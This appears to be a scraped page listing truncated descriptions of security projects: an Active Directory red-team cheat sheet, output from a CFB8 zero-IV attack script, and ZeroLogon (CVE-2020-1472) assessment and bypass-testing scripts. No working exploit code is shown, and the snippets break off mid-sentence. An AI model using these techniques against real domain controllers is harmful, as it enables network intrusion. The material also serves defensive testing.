JustGetDA JustGetDA, a cheat sheet which will aid you through internal network & red team engagements AD Mindmap (Click on the image for a larger image) Credit: mayfly (@M4yFly) & viking (@Vikingfr) Privilege Escalations The below privilege escalations are inspired from: githubcom/cfalta/MicrosoftWontFixList Local Privilege Escalation: InstallerFi

CFB8 Zero IV Attack ❯ python cfb8_zero_iv_attackpy [!] Attack Success Number of trials: 275 Key: b'U\x1e\x9eoKd\x18\xdf\x0c\x05\xfc3\x1f4\xd9\x8e' IV: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Plaintext: b'\x00\x00\x00\x00\x00\x00\x00\x00' Ciphertext: b'\x00\x00\x00\x00\x00\x00\x00\x00'

Patch and enforcement key assessment for CVE 2020-1472

ZeroLogonAssess Patch and enforcement key assessment for CVE 2020-1472 Script will: Detect all Domain Controllers Scan for relevant installed updated Check for enforcement registry keys This is loosely based on CISA Validation script Unfortunately whilst attempting to fix bugged output I came to the view that the existing code's workflow of appending to a csv file and r

ZeroLogon testing script A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472) It attempts to perform the Netlogon authentication bypass The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations When a domain controller is patched, the detection script will g